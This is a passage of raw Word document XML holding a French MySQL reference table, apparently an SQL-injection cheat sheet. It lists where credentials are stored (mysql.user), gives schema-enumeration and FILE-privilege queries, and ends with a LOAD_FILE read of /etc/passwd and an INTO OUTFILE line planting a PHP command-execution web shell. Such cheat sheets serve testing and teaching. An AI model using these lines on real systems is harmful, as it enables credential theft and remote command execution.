              <w:t>database</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">(), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00362AA5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="404"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9128" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00643938" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Titre2"/>
              <w:spacing w:after="120" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Crédentiels</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> de la base de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="389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bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/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  <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r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  <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">Table (privilèges </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r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  <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r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  <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> requis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>mysql.user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="404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bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/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  <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r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>Colonnes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:cnfStyle w:val="00000010000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D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>user, password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00362AA5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="404"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9128" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00643938" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Paragraphedeliste"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="120"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Nom de la base de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="404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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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</w:rPr>
              <w:t>Tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000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D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>information_schema.schemata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysql.db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="389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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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</w:rPr>
              <w:t>Columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000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D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>schema_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>, db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="404"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9128" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00643938" w:rsidRDefault="00643938" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Quelques</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00643938">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>requets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="1602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pStyle w:val="Titre3"/>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:outlineLvl w:val="2"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Trouver des tables à partir d’une colonne</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Titre4"/>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:outlineLvl w:val="3"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="008829E7" w:rsidRDefault="00F61AC2" w:rsidP="00057E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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000"/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</w:pPr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SELECT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table_name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FROM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information_schema.columns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WHERE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column_name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= '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myColumn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';</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="006A3C77" w:rsidRDefault="00F61AC2" w:rsidP="00057E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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr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SELECT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table_name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FROM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information_schema.columns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WHERE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column_name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LIKE '%Col%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="1602"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:outlineLvl w:val="2"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D05FD5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Trouver des colonnes à partir d’une table</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Titre4"/>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:outlineLvl w:val="3"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="008829E7" w:rsidRDefault="00F61AC2" w:rsidP="00057E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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000"/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</w:pPr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SELECT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column_name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FROM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information_schema.columns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WHERE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table_name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= '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myTable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';</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="006A3C77" w:rsidRDefault="00F61AC2" w:rsidP="00057E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bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr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SELECT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column_name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FROM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information_schema.columns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WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008829E7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LIKE '%Tab%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61AC2" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="404"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9128" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00F61AC2" w:rsidRPr="00AD4140" w:rsidRDefault="00F61AC2" w:rsidP="00057EC1">
            <w:pPr>
              <w:pStyle w:val="Titre2"/>
              <w:spacing w:after="120" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="1"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4140">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Privilege file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="569"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidRDefault="00AD4140" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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</w:rPr>
              <w:t xml:space="preserve">Privileges root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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</w:rPr>
              <w:t>sont</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:rPr>
              <w:t xml:space="preserve"> necessaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="006A3C77" w:rsidRDefault="00AD4140" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr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 xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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file_priv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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mysql.user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> WHERE user = 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="1033"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidRDefault="00AD4140" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pP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</w:rPr>
              <w:t>Pas de privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="006A3C77" w:rsidRDefault="00AD4140" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr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 xml:space="preserve">SELECT grantee, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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is_grantable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> FROM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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information_schema.user_privileges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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privilege_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> = 'file' AND grantee like '%username%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
          <w:trHeight w:val="674"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/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</w:pP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 xml:space="preserve">Les fichiers peuvent </w:t>
            </w:r>
            <w:r w:rsidR="00643938"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>être</w:t>
            </w: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 xml:space="preserve"> lus si l’utilisateur a le </w:t>
            </w:r>
            <w:r w:rsidR="00643938"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>privilège</w:t>
            </w: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 xml:space="preserve"> File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="006A3C77" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000100000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr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SELECT LOAD_FILE('/etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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passwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidTr="004A3E60">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
          <w:trHeight w:val="674"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="4286" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="00D05FD5" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/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</w:pP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 xml:space="preserve">Les fichiers peuvent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>etre</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> créer si l’utilisateur a le </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>privilege</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4842" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D05FD5" w:rsidRPr="006A3C77" w:rsidRDefault="00D05FD5" w:rsidP="00057EC1">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="120"/>
              <w:cnfStyle w:val="000000010000"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr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SELECT '&lt;? system($_GET[\'c\']); ?&gt;' INTO OUTFILE '/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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var/www/shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:rPr>
              <w:t>';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05FD5" w:rsidRPr="00362AA5" w:rsidTr="004A3E60">
